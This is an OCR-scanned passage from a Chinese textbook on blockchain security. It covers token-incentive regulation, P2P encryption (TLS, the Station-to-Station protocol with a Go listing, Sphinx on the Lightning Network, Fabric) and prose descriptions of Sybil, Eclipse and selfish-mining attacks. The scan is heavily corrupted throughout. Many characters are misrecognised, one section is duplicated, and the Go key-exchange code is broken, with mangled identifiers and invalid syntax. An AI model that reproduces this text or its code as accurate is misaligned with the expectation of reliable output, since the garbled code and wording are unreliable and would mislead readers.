综 上 ， 虚 拟 通 证 激励 类 项 目 由 于 其 特殊 的 性 质 ， 项 目 投资 者 和 项 目 方 均 可 隐匿 身份 自由 交易 ， 而 通 证 发 放 过 程 的 不 确定 性 导致 对 投资 者 的 保护 极其 脆弱 。 此 外 ， 其 交易 环境 存在 虚拟 性 ， 并 可 在 跨越 
国界 的 虚拟 世界 中 运作 ， 中 间 缺 乏 监管 抓 手 ， 有 可 能 帝 来 和 洗钱、 恐怖 融资 和 逃避 制裁 等 一 系列 风险 。 


4.2.5 ” 通 证 激励 的 安全 措施 


2016 年 9 月 ， 沸 沸 扬 扬 的 通 证 激励 发 放 迎 来 国家 七 部 委 联 合 上 帮 文 的 监管 洗礼 。 市 场 泡沫 被 刺 破 ， 安 全 壁垒 在 重建 的 过 程 中 ， 业 界 和 监管 层 对 于 区 块 链 技术 应 用 和 虚拟 货币 的 多 重 属性 都 必须 重新 认识 
和 理解 。 如 何 让 市 场 安 全 回归 理性 ， 在 现 有 的 法 律 框 染 下 更 妥善 解决 投资 者 权益 保护 、 金 融 创新 保护 等 诸多 事宜 ， 是 未 来 更 多 挑战 的 开始 。 监 管 本 身 是 打击 金融 过 程 中 的 风险 。 乱 象 丛生 的 通 证 激励 项 目 
被 及 时 禁止 的 同时 ， 区 块 链 技术 却 收获 了 更 多 的 正面 天 注 度 。 通 证 激励 模式 本 是 天 生 适 应 区 块 链 项 目 融资 的 一 项 创新 ， 只 是 在 逐渐 被 演绎 为 中 心 化 模式 的 过 程 中 逐步 背离 了 区 块 链 去 中 心 、 民 主 、 自 生 秩 
序 的 精髓 。 而 区 块 链 因 其 在 科技 创新 领域 中 的 巨大 潜在 前 景 ， 组 庸 置疑 仍 将 芝 勃 发 展 。 在 当前 环境 下 ， 有 必要 对 新 的 区 块 链 项 目 各 项 安全 措施 加 以 梳理 ， 逐 渐 演化 出 理性 的 、 有 益 于 区 块 链 技术 发 展 落 地 
的 合 规 融 资 渠 道 ， 才 能 为 真正 从 事 区 块 链 技术 研发 和 有 益 探 索 的 企业 和 项 目 输入 动力 。 


建议 各 方 在 关注 创新 性 、 合 规 性 的 前 提 下 ， 考 量 项 目 风 险 收益 ， 还 原 交易 本 质 结 构 ， 重 点 关注 信息 披露 、 资 金 托管 、 投 资 适 格 、 项 目 真 实 等 方面 ， 根 据 区 块 链 项 目的 内 容 类 型 ， 建 立 相 应 的 安全 措施 
和 机 制 保障 。 在 项 目 管理 措施 上 ， 项 目 方 本 身 应 遵循 国家 反 洗 钱 、 税 收 和 外 汇 管制 的 系列 规定 ， 做 好 信息 披露 和 风险 预警 ， 并 加 强行 业 自律 ， 设 计 和 完善 反 洗 钱 监 控 体 系 和 风险 规范 ， 将 项 目 置 于 专业 审 
查 和 支持 下 ， 主 动 拥抱 合 规 和 监管 。 投 后 管理 方面 ， 为 避免 中 心 化 模式 下 基于 自身 账户 的 资金 管理 产生 的 极 大 风险 ， 可 借鉴 资金 托管 模式 ，3 引 入 有 资质 的 托管 人 对 募集 的 虚拟 货币 进行 定向 托管 ， 并 定期 
披露 虚拟 货币 价值 信息 及 流转 信息 ， 保 障 投资 人 合法 权益 ,确保 项 目的 合 规 与 安全 。 


4.3 ”本 章 小 结 


区 块 链 茵 覆 了 传统 互联 网 体系 下 “应 用 为 王 ” 的 商业 模式 ， 通 过 分 布 式 账 本 和 激励 机 制 重 构 了 行业 生态 。 在 未 来 的 去 中 心 化 世界 中 ， 随 着 越 来 越 多 的 应 用 程序 构建 在 底层 系统 之 上 ， 其 激励 层 的 基础 
价值 将 越 来 越 高 。 


回归 区 块 链 本 质 来 看 ， 区 块 链 通过 共识 带 来 了 组 织 协 作 效 率 的 提升 ， 通 过 加 密 通 证 赋予 生态 内 价值 交换 效率 的 提升 ， 使 得 整个 商业 逻辑 的 运行 从 规则 不 透明 、 不 平等 ， 进 化 到 开源 透明 、 公 平 、 自 动 
执行 的 平等 新 机 制 ， 区 块 链 数字 经 济 体 必 将 以 科技 的 形态 带 来 商业 生态 模式 和 整个 世界 的 变革 。 


第 5 草 ”网 络 层 安全 与 控制 


区 块 链 技术 大 量 依赖 于 基于 互联 网 的 P2P 网 络 ， 可 以 说 没有 P2P 网 络 的 支撑 就 没有 区 块 链 的 友 展 。 本 章 将 介绍 区 块 链 网 络 层 安全 与 控制 的 一 些 基础 知识 ， 包 括 P2P 加 密 、 客 户 端 与 节点 通信 加 密 以 及 防 
御 DDoS 攻 击 。 为 了 加 深 读者 的 理解 ， 文 中 将 结合 一 些 具体 实例 进行 介绍 。 希 望 通过 本 章 的 讲解 ， 能 让 读者 大 体 了 解 目 前 区 块 链 系统 是 如 何 保证 网 络 层 安全 的 。 


P2P 网 络 又 称 为 对 等 式 网 络 ， 或 点 对 点 网 络 。 这 是 一 种 无 中 心服 务 器 、 完 全 由 用 户 群 交 换 信息 的 互联 网 体系 ，P2P 网 络 的 每 个 用 户 端 既 是 一 个 客户 端 ， 同 时 也 具备 服务 器 的 功能 。 网 络 中 所 有 节点 通过 
物理 链接 或 逻辑 链接 实现 互联 。 


相 比 于 服务 器 -客户 机 的 中 心 化 架构 网 络 ，P2P 架 构 网 络 有 着 较 多 优势 : 所 有 的 客户 端 都 能 提供 资源 ， 包 括 带 完 、 存 储 空间 和 计算 能 力 ， 这 种 网 络 的 容量 可 以 远 超 有 中 心服 务 器 的 网 络 ; P2P 的 分 布 特 
性 通过 在 多 节点 上 的 数据 复制 ， 使 得 系统 更 健壮 ; 信息 的 传输 分 散在 各 节点 之 间 进 行 ， 而 无 须 经 过 某 个 中 心服 务 器 ,用 户 的 隐私 信息 被 窃听 和 泄漏 的 可 能 性 大 大 缩小 。 


5.1 ” P2P 加 密 


5.1.1 区 块 链 与 P2P 网 络 的 关系 


从 技术 本 质 上 来 说 ， 区 块 链 技术 实际 就 是 P2P 网 络 + 密码 学 + 共识 算法 。 区 块 链 是 一 个 基于 P2P 架 构 的 分 布 式 网 络 ， 通 过 密码 学 来 保证 数据 的 安全 性 ， 通 过 共识 算法 来 保证 节点 数据 的 一 致 性 。 不 同 的 
区 块 链 系统 会 根据 实际 需要 去 定制 适合 自身 系统 的 P2P 协 议 ， 比 特 币 有 适合 自己 的 P2P 定 制 协议 ， 以 太 坊 也 有 自己 的 P2P 定 制 协议 ， 联 盟 链 厂 家 也 会 定制 自己 的 P2P 协 议 。 


从 设计 目的 上 来 说 ， 区 块 链 是 为 了 解决 P2P 这 一 去 中 心 化 的 分 布 式 网 络 中 对 等 节点 所 记录 信息 不 可 信赖 的 问题 ， 包 括 信息 不 完整 、 信 息 被 算 改 等 。P2P 网 络 的 优势 能 解决 很 多 中 心 化 网 络 中 的 问题 。 比 
如 ， 现 阶段 的 商业 贸易 清算 支付 都 需要 依赖 于 各 银行 ， 包 括 贸 易 方 的 开户 行 、 贸 易 对 手 的 开户 行 以 及 央行 。 在 贸易 过 程 中 的 每 一 个 环节 每 个 银行 都 有 自己 的 账 务 系 统 ， 每 笔 交 易 不 仅仅 需要 在 本 银行 记 
录 ， 还 要 在 贸易 对 手 的 银行 进行 清算 对 账 。 在 这 种 集中 式 的 清算 机 制 下 ， 至 少 需 要 一 个 中 心 节点 来 记录 交易 双方 的 账本 。 然 而 这 种 中 心 化 的 清算 架构 会 随 着 接 入 银行 的 增加 而 降低 清算 速度 ， 并 且 系 统 还 
会 面临 风险 。 比 如 “9.11 事 件 ” 中 ， 美 国 世贸 中 心 遭 遇 和 袭击 后 ， 美 国 纽约 支付 清算 系统 运行 中 断 。 虽 然后 续 紧 急切 换 并 没有 造成 数据 丢失 ， 但 是 这 一 过 程 投 入 了 大 量 精力 ， 并 且 承 担 了 极 大 的 风险 。 而 分 


布 式 P2P 网 络 几乎 不 存在 单 点 故障 ， 并 且 就 算 网 络 中 的 节点 频繁 地 进入 或 退出 也 不 会 影响 整个 系统 的 稳定 性 。 如 果 再 加 上 区 块 链 技术 解决 了 P2P 网 络 中 节点 的 不 可 信赖 间 题 ， 那 么 以 这 种 方式 运行 的 一 个 分 
布 式 共享 账本 就 可 以 降低 交易 清算 的 复杂 性 和 维护 成 本 。 


5.1 ” P2P 加 密 


5.1.1 ”区 块 链 与 P2P 网 络 的 关系 
从 技术 本 质 上 来 说 ， 区 块 链 技 术 实际 就 是 P2P 网 络 + 密 码 学 + 共识 算法 。 区 块 链 是 一 个 基于 P2P 架 构 的 分 布 式 网 络 ， 通 过 密码 学 来 保证 数据 的 安全 性 ， 通 过 共识 算法 来 保证 节点 数据 的 一 致 性 。 不 同 的 
区 块 链 系统 会 根据 实际 需要 去 定制 适合 自身 系统 的 P2P 协 议 ， 比 特 币 有 适合 自己 的 P2P 定 制 协议 ， 以 太 坊 也 有 自己 的 P2P 定 制 协议 ， 联 盟 链 厂 家 也 会 定制 自己 的 P2P 协 议 。 


从 设计 目的 上 来 说 ， 区 块 链 是 为 了 解决 P2P 这 一 去 中 心 化 的 分 布 式 网 络 中 对 等 节点 所 记录 信息 不 可 信赖 的 问题 ， 包 括 信息 不 完整 、 信 息 被 纂 改 等 。P2P 网 络 的 优势 能 解决 很 多 中 心 化 网 络 中 的 问题 。 比 
如 ， 现 阶段 的 商业 贸易 清算 支付 都 需要 依赖 于 各 银行 ， 包 括 贸易 方 的 开户 行 、 贸 易 对 手 的 开户 行 以 及 央行 。 在 贸易 过 程 中 的 每 一 个 环节 每 个 银行 都 有 自己 的 账 务 系统 ， 每 笔 交 易 不 仅仅 需要 在 本 银行 记 
录 ， 还 要 在 贸易 对 手 的 银行 进行 清算 对 账 。 在 这 种 集中 式 的 清算 机 制 下 ， 至 少 需 要 一 个 中 心 节点 来 记录 交易 双方 的 账本 。 然 而 这 种 中 心 化 的 清算 架构 会 随 着 接 入 银行 的 增加 而 降低 清算 速度 ， 并 且 系 统 还 
会 面临 风险 。 比 如 “9.11 事 件 ” 中 ， 美 国 世贸 中 心 遭 遇 和 袭击 后 ， 美 国 纽约 支付 清算 系统 运行 中 断 。 虽 然后 续 紧 急切 换 并 没有 造成 数据 丢失 ， 但 是 这 一 过 程 投 入 了 大 量 精力 ， 并 且 承 担 了 极 大 的 风险 。 而 分 
布 式 P2P 网 络 几乎 不 存在 单 点 故障 ， 并 且 就 算 网 络 中 的 节点 频繁 地 进入 或 退出 也 不 会 影响 整个 系统 的 稳定 性 。 如 果 再 加 上 区 块 链 技术 解决 了 P2P 网 络 中 节点 的 不 可 信赖 问题， 那么 以 这 种 方式 运行 的 一 个 分 
布 式 共 享 账本 就 可 以 降低 交易 清算 的 复杂 性 和 维护 成 本 。 


5.1.2 ”区 块 链 上 的 P2P 应 用 与 加 密 

公有 链 开放 的 特性 决定 了 它 不 会 在 其 区 块 链 网 络 中 采用 P2P 加 密 。 区 块 链 中 的 P2P 加 密 应 用 一 般 都 是 在 联盟 链 或 私有 链 这 类 半 开 放 或 私有 的 区 块 链 环境 中 。 尤 其 是 在 联盟 链 这 种 节点 之 间 人 存在 合作 又 并 
不 完全 互信 的 场合 ， 使 用 P2P 加 密 从 技术 上 可 以 解决 部 分 不 信任 的 问题 。 下 面 介 绍 一 些 联盟 链 中 可 能 会 用 到 的 加 密 技术 。 
1. 区 块 链 (联盟 链 ) 采用 P2P 加 密 的 意义 


通过 在 区 块 链 (联盟 链 ) 节点 与 节点 之 间 、 客 户 端 与 节点 之 间 建 立 安 全 的 加 密 隧道 ， 可 以 防止 在 区 块 链 网 络 传输 过 程 中 把 敏感 信息 暴露 给 外 部 。 比 如 在 用 于 担保 融资 的 联盟 链 中 ， 节 点 之 间 传 递 了 担 
保 企 业 、 贷 款 企 业 的 账户 信息 以 及 担保 合同 等 敏感 信息 ， 在 对 这 些 信息 本 身 加 密 的 基础 上 ， 再 部 署 P2P 加 密 ， 可 以 有 效 地 防止 信息 被 破解 泄漏 。 


采用 P2P 加 密 的 好 处 不 止 于 此 ， 还 可 以 减少 部 分 网 络 安全 的 监管 工作 。 如 上 面 摘 述 的 部 署 P2P 加 密 的 联盟 链 中 ， 如 果 联 盟 成 员 能 保证 加 入 区 块 链 中 的 节点 是 可 信 的 ， 那 么 在 这 种 受 高 度 监管 的 网 络 环境 
中 ， 安 全 性 会 大 大 提高 ， 对 网 络 的 监管 和 维护 的 工作 量 同时 也 大 大 降低 。 


2. 可 用 于 区 块 链 网 络 中 的 P2P 加 密 解 决 方案 


(1) 使 用 通用 网 络 解决 方案 


SSL/TLS 等 利用 端口 和 网 络 技术 加 密 网 络 内 的 数据 流 ， 这 些 技术 在 现代 服务 器 和 工作 站 上 已 经 有 着 比较 成 熟 的 应 用 。SSLTLS 可 以 结合 HTTP 协 议 组 合成 HTTPS 协 议 来 加 密 Web 内 容 ， 也 可 以 和 一 些 常 
用 的 应 用 层 协议 (比如 FTP、SMTP、POP 等 ) 组 合 来 保证 P2P 网 络 中 应 用 层 数 据 的 安全 传输 。 


比特 币 官方 “钱包 ”Bitcoin-Qt 在 较 早 的 版 本 (0.3.14) 中 就 开始 支持 通过 配置 来 打开 或 关闭 SSL 加 密 JSON-RPC 通 信 的 功能 (后 来 由 于 设计 上 的 考虑 一 一 认为 允许 任意 客户 端 都 可 以 访问 JJON-RPC 
端口 是 危险 和 不 明智 的 ，“ 钱 包 ” 用 户 应 该 通过 严格 限定 可 信任 的 客户 端 来 保证 通信 的 安全 ， 所 以 官方 觉得 没 必 要 在 后 续 版 本 中 继续 维护 这 个 功能 。 最 新 的 钱包 版 本 中 已 经 废弃 了 该 功能 。 对 于 一 定 要 使 
用 该 功能 的 用 户 ， 官 方 的 建议 是 使 用 第 三 方 软件 Stunnel 提 供 SSL 服 务 来 实现 加 密 通信 ) 。 


(2) 站 到 站 协议 


站 到 站 (Station-To-Station) 协议 是 一 个 密码 秘 钥 协 商 方案 ， 基 于 经 典 的 Diff ie-Hellman 秘 钥 交换 算法 ,提供 了 相互 密 钥 和 实体 的 认证 。 根 据 协议 的 描述 ， 可 用 于 区 块 链 节点 的 验证 和 对 数据 流 的 
加 密 。 以 下 协议 流程 基于 站 到 站 协议 文档 上 


当 节 点 之 间 建立 TCP 连 接 时 ， 站 到 站 协议 按 以 下 方式 来 工作 。 

1) 建立 连接 之 前 ， 首 先 设置 好 数据 共享 (各 节点 生成 的 公 铀 ， 组 参数 p， 发 生 器 9) 。 

2) 站 到 站 协议 启动 。 假 设 所 有 的 设置 数据 已 被 共享 ， 站 到 站 协议 按 如 下 方式 进行 。 如 果 步骤 无 法 完成 ， 协 议 立即 停止， 

@ 节 点 A 生 成 随机 数 x， 计 算 并 将 指数 gx 发 送 给 节点 B。 

@ 节 点 B 生 成 随机 数 y 并 计算 指数 gy 

@ 节 点 B 计 算 共享 密 钥 K= (gx) Y 

@ 节 点 B 连 接 指数 (gy，gx) ” (顺序 很 重要 ) ， 使 用 其 非 对 称 私 铀 B 对 它们 进行 签名 ， 然 后 用 K 加 密 签名 。 它 将 密 文 以 及 指数 gy 发 给 节点 A。 
@ 节 点 A 计 算 共享 密 铀 K= (gy) x。 

@ 节 点 A 使 用 其 非 对 称 公 钥 解 密 和 验证 了 节点 B 的 签名 。 

@ 节 点 A 连 接 指数 (gx，gy) ”( 顺 序 很 重要 ) ， 使 用 其 非 对 称 密 钥 A 对 其 进行 签名 ， 然 后 用 K 加 密 签名 。 它 把 密 文 发 给 了 节点 B。 
@ 节 点 B 使 用 不 对 称 的 公 钥 解密 和 验证 了 节点 A 的 签名 。 

@ 现 在 节点 A 和 节点 B 已 经 相互 认证 ， 并 有 共同 的 秘 钥 。 这 个 秘 钥 K 可 以 用 来 加 密 进一步 的 通信 。 


以 下 是 对 上 面 流程 的 Go 语言 实现 。 








func MakeSecretConnection (conn io.ReadWriteCloser, locPrivRKey crypto.PrIVKeyEdq25519) 
(*SecretConnection, error) 1 
// 当 两 个 peet 建 立 一 个 TCP 连 接 时 ， 它 们 首先 针对 这 个 会 话 生成 一 个 短暂 的 ED25519 密 钥 对 
locPubKey := JocPriVKey.PubKey () .Unwtap () . (crypto.PubKeyEd25519) 
locEphPub, locEphPriv := genEphKeys () 


// Peer 之 间 相 互 发 送 它 们 各 自生 成 的 短暂 公 乌 
remEphPub, err := shareEphPubKey (conn, locEphPub) 
if err != nil { 

return nil, err 
























































} 


// 0 k 享 密 钥 是 对 方 短暂 私 钥 与 对 方 短暂 公 钥 的 乘法 。 共 享 密 钥 被 用 作 加 密 算法 的 
// 对 称 密 钥 
shrSecret := computeSharedSecret (remEphPub, locEphPriv) 


// 对 这 两 个 短暂 秘 钥 分 类 排序 ， 建 立 一 个 规范 的 顺序 
loEphPub, hiEphPub := sort32 (locEphPub, remEphPub) 
locIsLeast := bytes.Equal (locEphPub[:], loEphPub[:]) 


// 生成 nonce 随 机 数 ，nonce 被 用 来 加 密 1 解 密 。 两 个 随机 数 ， 一 个 用 于 加 密 我 们 自己 的 消息 ， 一 个 用 于 
// 解密 我 们 的 对 端 


recvNonce, sendNonce := genNonces (loEphPub, hiEphPub, locIlsLeast) 
















































































































































































// 生成 challenge 
// 然后 每 个 beer 用 持久 的 私 钥 签名 challenge， 并 问 对 方 发 送 一 个 AuthSsigMsg， 其 中 包含 持久 公 钥 和 签名 
// 在 接收 到 AuthSigMsg 后 ， 对 方 验证 签名 
challenge := genChallenge (loEphPub, hiEphPub) 
sc := &SecretConnectiont{ 
COmMA: CoOnny 
recvBuffer: nil, 
recvNonce: recvNonce, 
sendNonce: sendNonce, 
shrSecret: shrSecret, 


















































locSignature := signChallenge (challenge, locPrivkKey) 
authSigMsg, err := shareAuthSignature(sc, locPubKey, locSignature) 
if err != nil { 








return nil, err 





} 

remPubKey, remSignature := authSigMsg.rKey, authSigMsg.Sig 

If !remPubKey.VerifyBytes (challenge[:], remSignature) ({ 
return nil, errors.New("Challenge verification failed") 





























} 


// 现在 ，peer 已 经 通过 了 身份 认证 
sc.remPubKey = remPubKey .Unwrap(). (crypto.PubKeyEd25519) 
return sc, nil 


























(3) Sphinx 协 议 


sphinx 协 议 采 用 一 种 特殊 的 加 密 消息 格式 ， 用 于 在 混合 网 络 中 传递 匿名 消息 。 它 支持 全 套 的 安全 特性 一 一 难以 回溯、 隐藏 路 径 长 度 和 中 继 位 置 ， 以 及 为 网 络 中 每 条 需要 中 继 的 消息 提供 不 可 链接 性 。 
使 用 Sphinx 协 议 可 以 解决 比特 币 内 电网 络 中 的 交易 数据 隐私 问题 。 


下 面 是 Sphinx 机 制 的 简要 概述 。 


Alice 想 要 通过 闪电 网 络 支 付 给 Bob (Y_b) 。Alice 查 询 她 的 路 由 表 ， 发 现 需要 通过 Carol 和 Dave 来 路 由 。 为 了 创建 混合 头 部 (Mix-headers) ，Alice 需 要 为 Carol (Y_c) 和 Dave (Y_d) 生成 密 钥 
对 。 她 首先 生成 一 个 临时 的 DH 密 钥 对 (a_0=g^x) ， 然 后 继续 再 为 路 由 中 的 每 一 跳 导 出 一 个 共享 秘 钥 (s_ 们 ) 。 


以 下 是 DH 秘 钥 对 的 推导 形式 (s= 共 享 秘 钥 ，b= 致 育 因 素 (Blinding Factor) ) 。 
a 0=g^x, sO0= (Yc) ^x, b 0=hash(a 0,s 0) 

a1= (a0) ^b0, s1= (Yd) ^x*b 0, b 1=hash(a 1,s 1) 

a2= (a1) ^b1, s2= (Yb) ^x*b 0*b 1, b 2=hash(a 2,s 2) 

在 上 面 的 例子 中 ，Alice 经 过 3 跳 到 Bob。 如 果 路 线 中 有 更 多 跳 路 ， 则 继续 以 上 步骤 。 


通过 以 上 方式 ,付款 人 在 网 络 上 确定 一 条 路 径 并 加 密 打 包 一 个 支付 ， 并 且 这 个 加 密 在 消息 的 路 由 中 会 进行 多 次 ， 产 生 多 个 加 密 层 。 所 有 的 中 介 节 点 只 能 打开 它 对 应 的 加 密 层 ， 了 解 要 将 这 条 交易 路 由 
到 何 处 。 中 介 节 点 并 不 知道 自己 是 整个 支付 链 中 的 哪 一 步 ， 只 有 交易 发 送 者 和 接收 者 才 知道 谁 发 送 的 交易 以 及 谁 接收 了 交易 。 


3.P2P 加 密 在 区 块 链 中 的 应 用 
(1) 比特 币 ， 以 太 坊 
由 于 比特 币 和 以 太 坊 公 链 的 特性 ， 所 有 数据 默认 公开 ， 节 点 可 以 自由 进出 ， 所 以 比特 币 或 以 太 坊 网 络 中 的 节点 并 不 会 采用 P2P 加 密 。 
(2) 比特 币 闪电 网 络 


比特 币 网 络 并 不 是 完全 匿名 的 ， 通 过 对 没有 加 密 的 P2P 网 络 进行 监控 ， 交 易 及 区 块 分 析 是 能 捕捉 到 用 户 行为 的 。 比 如 鲍 勃 开 了 一 个 咖啡 馆 并 且 支 持 比特 币 支付 ， 顾 客 买 了 咖啡 后 向 鲍 勃 的 比特 币 地 址 
里 支付 相应 金额 的 比特 币 ， 顾 客 们 包括 竞争 对 手 都 能 很 轻易 地 通过 鲍 勃 的 比特 币 地 址 查询 到 每 一 笔 交易 ， 这 样 的 商业 隐私 泄漏 对 鲍 勃 来 说 是 无 法 接受 的 。 针 对 这 样 的 问题 ， 目 前 比较 有 前 景 的 解决 方案 就 
是 闪电 网 络 +Sphinx[o 协 议 。 

闪电 网 络 的 本 质 是 在 比特 币 主 链 外 建立 一 个 可 以 双向 流动 的 微 支 付 通道 ， 币 可 以 跨 节点 传递 的 网 络 。 将 大 量 小 额 交 易 放 到 闪电 网 络 上 ， 减 少 主 链 上 的 负荷 并 提高 小 额 交易 的 速度 。 

闪电 网 络 结合 Sphinx 协 议 后 ， 将 网 络 上 的 数据 包 进 行 多 次 加 密 ， 闪 电网 络 中 的 中 介 节 点 只 能 打开 相关 的 加 密 层 ， 这 一 层 只 向 中 介 节 点 展示 这 个 包 要 路 由 到 何 处 。 这 样 就 实现 了 在 网 络 上 隐藏 详细 的 交 


易 细 节 。 


再 次 回 到 上 面 咖啡 店 的 例子 。Alice 喜 欢 去 Bob 的 咖啡 店 喝 咖 啡 ， 他 们 之 间 商 定 文 付 通道 满 0.1 比 特 币 后 关闭 通道 进行 结算 。Alice 喝 了 100 次 咖啡 ， 这 100 次 交易 只 在 内 电网 络 上 传递 ， 并 且 经 过 sphinx 
协议 打包 加 密 ， 所 以 中 介 节 点 也 无 法 获取 交易 详情 ， 等 到 0.1 比 特 币 满 额 后 交易 通道 关闭 ， 合 并 的 交易 结果 写 入 区 块 链 ， 最 终 在 区 块 链 上 能 查 到 的 也 就 是 合并 后 的 那 笔 交易 ， 隐 藏 了 Alice 和 Bob 之 间 的 交易 
隐私 。 


(3) 超级 账本 (Fabric) 


Fabric 提 供 了 证 书 授权 模块 ， 包 含 登记 证 书 授权 、 事 务 证 书 授权 、TLs 证 书 授权 等 。 用 户 、 客 户 端 、 验 证 节点 、 非 验证 节点 等 需要 在线 下 向 证 书 颁发 机 构 提交 强身 份 识别 证 明 ， 经 过 验证 才 可 以 接 入 
Fabric 区 块 链 网 络 。Fabric 区 块 链 组 件 (客户 端 、 验 证 节点 和 非 验 证 节点 等 ) 间 的 通信 安全 是 基于 TLs 安 全 链接 的 ， 在 网 络 层 建立 安全 的 加 密 通道 ， 加 密 消息 并 防止 P2P 网 络 攻击 。 后 文 会 对 Fabric 进 行 具 


[1] https://en.wikipedia.org/ wiki/Station-to-Station_protocol。 


[2] http://www.cypherpunks.ca/ ~iang/pubs/Sphinx_Oakland09.pdf。 


5.2 ”客户 并 与 证 卢 通 信人 加密 (联盟 链 ) 


5.2.1 ”有 恶意 客户 端 作恶 方式 及 后 果 
恶意 客户 端 或 节点 可 以 从 应 用 层 、 履 盖 层 和 网 络 层 3 个 层面 对 P2P 网 络 友 起 攻击 。 每 一 层 的 安全 都 依赖 于 下 一 层 提供 的 保障 ， 应 用 层 的 安全 由 履 盖 层 来 保障 ， 履 盖 层 的 安全 由 网 络 层 来 保障 。 
' 应 用 层 的 安全 漏洞 主要 来 自 于 应 用 程序 接口 。 
. 履 盖 层 的 安全 威胁 主要 来 自 于 恶意 路 由 ， 当 P2P 网 络 中 履 盖 层 部 分 或 大 量 路 由 表 被 破坏 时 ， 建 立 在 履 盖 层 之 上 的 应 用 层 的 功能 很 可 能 就 会 被 中 断 。 
:网络 层 的 安全 漏洞 主要 是 数据 包 的 拦截 、 签 改 和 路 由 错误 等 。 


针对 P2P 网 络 应 用 层 ， 履 盖 层 和 网 络 层 攻击 类 型 如 图 5-1 所 示 。 


攻击 六 用 层 SA 服务 欺诈 、 资 源 消耗 、 
==》 凡 用 层 aby 


攻击 ”Eee》 覆盖 层 < Sybil 攻击 、 路 由 毒害 、 
DDoS 攻 击 、Eclipse 攻 击 等 


攻击 。 网 络 层 下 其 绩 、 路 外 其 验 、 
| 


报 文 截 取 、 报 文 复 改 等 





图 5-1 P2P 网 络 攻击 分 层 


与 其 他 的 一 些 应 用 程序 不 同 ，P2P 的 应 用 建立 在 覆盖 层 上 。 由 于 多 了 这 一 层 ， 也 引入 了 额外 的 攻击 层 。 假 设 履 盖 层 下 面 的 网 络 层 是 安全 可 靠 的 ， 那 么 恶意 客户 端 通过 对 履 盖 层 的 攻击 就 可 能 阻碍 P2P 系 
统 的 功能 。 以 下 介绍 两 类 P2P 网 络 中 比较 典型 的 覆盖 层 攻击 ， 以 及 衍生 出 来 的 相应 攻击 形式 。 


1.Sybil 攻 击 


公有 链 中 ， 在 没有 身份 认证 机 构 的 情况 下 ， 用 户 创 建新 身份 或 新 节点 是 不 需要 代价 的 ， 攻 击 者 可 以 很 容易 地 伪造 身份 加 入 网 络 ， 并 试图 去 获取 大 量 的 ID。 在 掌握 了 若干 节点 或 节点 身份 之 后 ， 他 们 可 
以 随意 做 出 一 些 恶 意 的 行为 ， 比 如 发 出 虚假 节点 加 入 请 求 消息 ， 误 导 节点 之 间 正 确 路 由 来 降低 区 块 链 网 络 节点 查找 效率 ; 发 布 虚假 资源 或 是 故意 不 响应 请 求 来 消耗 节点 之 间 的 链接 资源 等 。 


图 5-2 演 示 了 在 比特 币 网 络 中 ， 大 量 的 Sybil 节 点 被 注入 到 网 络 中 。 这 些 节点 可 以 假冒 比特 币 的 全 节点 ， 故 意 不 响应 请 求 ， 使 得 其 他 节点 必须 为 此 等 待 ， 从 而 拖 慢 整个 区 块 链 网 络 的 速度 ;而 且 像 手机 钱 
包 这 种 SPV 节 点 ， 都 需要 通过 全 节点 才能 正常 收发 比特 币 ， 当 SPV 节 点 连接 到 这 种 假冒 的 全 节点 时 ， 它 们 就 无 法 正常 工作 了 。 





被 侵占 节点 () Sybil 节 点 





图 5-2 ”比特 币 网 络 中 Sybil 攻 击 示意 图 


2.Eclipse 攻 击 


这 种 攻击 通常 需要 Sybil 攻 击 的 配合 。 攻 击 者 通过 侵占 节点 的 路 由 表 ， 将 足够 多 的 虚假 节点 添加 到 某 些 节 点 的 邻居 节点 集合 中 ， 从 而 将 正常 节点 隔离 到 区 块 链 网 络 之 外 。 当 某 节 点 被 Eclipse 攻 击 时 ， 节 
点 的 大 部 分 对 外 路 由 都 会 被 控制 ， 然 后 恶意 节点 得 以 进一步 实施 路 由 欺骗 、 拒 绝 服 务 等 攻击 。Eclipse 攻 击 对 区 块 链 网 络 的 影响 非常 大 : 破坏 了 区 块 链 网 络 拓扑 的 完整 性 ， 亚 意 节 点 隔离 正常 节点 ， 导 致 网 
络 中 恶意 节点 增加 ， 正 常 节 点 数量 下 降 ， 共 识 及 账本 同步 效率 大 大 降低 。 


Eclipse 除了 会 对 网 络 本 身 造 成 破坏 ， 攻 击 者 还 可 以 基于 Eclipse 攻击 ， 扩 展 出 以 下 的 攻击 。 


. 区 块 竞争 : 当 两 名 矿工 同时 发 现 区 块 时 就 会 发 生 区 块 竞争 ， 正 常 结果 是 一 个 区 块 被 写 入 区 块 链 ， 发 现 它 的 矿工 拿 到 区 块 奖励 ， 而 另 一 个 “ 孤 块 ”将 被 忽略 ， 发 现 它 的 矿工 不 会 得 到 挖 矿 奖励 。 他 在 
可 以 通过 Eclipse 攻击 来 设计 区 块 竞赛 ， 他 在 侵蚀 大 量 矿工 节点 后 ， 一 旦 发 现 竞争 区 块 ， 就 将 “和 孤 块 ”广播 到 网 络 中 ， 那 些 被 Eclipse 攻击 的 节点 就 会 在 “ 孤 块 ”上 的 浪费 时 间 ， 从 而 导致 正常 区 块 无 法 及 时 
在 区 块 链 网 络 中 同步 。 


.自私 挖 矿 : 攻击 者 挖 到 一 个 新 块 后 ， 先 不 全 网 广播 而 是 私 藏 起 米 ， 而 其 余 的 矿工 还 在 卖力 地 继续 挖 矿 浪费 算 力 ， 这 样 相当 于 攻击 者 在 挖 下 一 个 区 块 时 抢 跑 了 。 此 外 ， 攻 击 者 还 会 同时 监控 其 他 矿 
池 ， 当 预测 其 他 诚实 矿 池 挖 到 新 块 要 广播 时 ， 他 就 利用 被 Eclipse 攻 击 的 节点 来 抱 慢 这 个 进程 ， 同 时 抢先 广播 他 所 私 藏 的 区 块 。 由 于 区 块 中 都 会 包含 时 间 惟 字段 ， 那 么 这 个 较 旱 被 挖 出 来 的 块 便 会 被 网 络 所 
承认 。 


3. 总 结 


在 比特 币 这 样 的 公有 链 环 境 中 ， 节 点 和 客户 端 加 入 是 没有 任何 限制 的 ， 所 以 攻击 者 很 容易 就 能 发 起 Sybil 攻 击 或 Eclipse 攻击 。 然 而 这 些 攻击 以 及 衍生 出 来 的 区 块 竞争 攻击 或 自私 挖 矿 攻 击 等 都 只 是 存在 
理论 上 的 可 能 性 ， 事 实 上 并 不 容易 操作 ， 也 不 符合 经 济 利益 。 大 部 分 矿工 加 入 网 络 除 了 支持 比特 币 网 络 的 友 展 ， 也 是 希望 能 获得 稳定 的 经 济 收入 。 如 果 某 人 上 肆意 地 攻击 网 络 ， 很 容易 造成 其 他 矿工 的 不 信 
任 ， 导致 别 的 矿工 不 愿意 再 验证 他 所 打包 的 区 块 。 


